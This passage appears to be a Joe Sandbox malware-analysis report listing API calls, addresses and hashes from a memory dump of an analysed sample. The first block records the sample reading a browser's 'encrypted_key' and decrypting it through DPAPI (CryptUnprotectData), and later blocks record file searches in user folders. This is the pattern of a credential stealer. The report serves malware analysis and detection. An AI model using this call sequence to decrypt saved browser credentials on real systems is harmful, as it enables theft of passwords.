                                    • Part of subcall function 00BA9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BA4EEE,00000000,?), ref: 00BA9B01
                                    • Part of subcall function 00BA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4EEE,00000000,00000000), ref: 00BA9B2A
                                    • Part of subcall function 00BA9AC0: LocalFree.KERNEL32(?,?,?,?,00BA4EEE,00000000,?), ref: 00BA9B3F
                                    • Part of subcall function 00BA9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BA9B84
                                    • Part of subcall function 00BA9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00BA9BA3
                                    • Part of subcall function 00BA9B60: LocalFree.KERNEL32(?), ref: 00BA9BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 5b24143c7afc74289e79285fdd0c7f569280174bd3a2e0d5a7a0c3c7db5f3f97
                                  • Instruction ID: 60f6e4dfd58fe3a14e63d70d2572b4e9048f80760d7e851d7d2a77f7e3d9a01e
                                  • Opcode Fuzzy Hash: 5b24143c7afc74289e79285fdd0c7f569280174bd3a2e0d5a7a0c3c7db5f3f97
                                  • Instruction Fuzzy Hash: B0313EB6D14209ABCB04DFE4DC85EEFB7F8EB49304F1445A9E905A7241EB309A44CBA1
                                  APIs
                                  • CreateFileA.KERNEL32(00BB3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00BB3AEE,?), ref: 00BB92FC
                                  • GetFileSizeEx.KERNEL32(000000FF,00BB3AEE), ref: 00BB9319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00BB9327
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID:
                                  • API String ID: 1378416451-0
                                  • Opcode ID: 08e55741e75a91d262f1a9568606ff46a6636dbb72a10ea7956d8a98224dada5
                                  • Instruction ID: f2e3a296a5bc51faf63157a29364fa49ae07524105e0f48287729ce66c42ddd5
                                  • Opcode Fuzzy Hash: 08e55741e75a91d262f1a9568606ff46a6636dbb72a10ea7956d8a98224dada5
                                  • Instruction Fuzzy Hash: 9DF03175E44305BBDB10EBB4DC85B9E77F9EB48710F10C194B651EB2C0D6B0A6018B54
                                  APIs
                                  • __getptd.LIBCMT ref: 00BBC74E
                                    • Part of subcall function 00BBBF9F: __amsg_exit.LIBCMT ref: 00BBBFAF
                                  • __getptd.LIBCMT ref: 00BBC765
                                  • __amsg_exit.LIBCMT ref: 00BBC773
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00BBC797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 59807d38eaaaedbe60bd0b7821b09af065e4030b370e6cd799d62b0f44b371ef
                                  • Instruction ID: 97d1a3edd8eb19332d0888993baeb56c9752adc3f2026db27c2932c10c3c95e1
                                  • Opcode Fuzzy Hash: 59807d38eaaaedbe60bd0b7821b09af065e4030b370e6cd799d62b0f44b371ef
                                  • Instruction Fuzzy Hash: 15F067329006009BD721BBB99807FFE3BE0AF04721F2441C9F455A72E2CFE49D409E9A
                                  APIs
                                    • Part of subcall function 00BB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4F7A
                                  • lstrcat.KERNEL32(?,00BC1070), ref: 00BB4F97
                                  • lstrcat.KERNEL32(?,01409F20), ref: 00BB4FAB
                                  • lstrcat.KERNEL32(?,00BC1074), ref: 00BB4FBD
                                    • Part of subcall function 00BB4910: wsprintfA.USER32 ref: 00BB492C
                                    • Part of subcall function 00BB4910: FindFirstFileA.KERNEL32(?,?), ref: 00BB4943
                                    • Part of subcall function 00BB4910: StrCmpCA.SHLWAPI(?,00BC0FDC), ref: 00BB4971
                                    • Part of subcall function 00BB4910: StrCmpCA.SHLWAPI(?,00BC0FE0), ref: 00BB4987
                                    • Part of subcall function 00BB4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00BB4B7D
                                    • Part of subcall function 00BB4910: FindClose.KERNEL32(000000FF), ref: 00BB4B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: afe050b950ef8d0c75426d1ad52ac7d47d603ce44a19fb1ce4fc3a6ecce42a10
                                  • Instruction ID: c7ea79f8680edb428ed1fb7ada82b0984e8c2ec21a1326a5be1f9d50fd854d11
                                  • Opcode Fuzzy Hash: afe050b950ef8d0c75426d1ad52ac7d47d603ce44a19fb1ce4fc3a6ecce42a10
                                  • Instruction Fuzzy Hash: C1219D7690030867C754FBB4DC86EED33BCA755300F0045D8B699D6191DEB4A6C8CBB2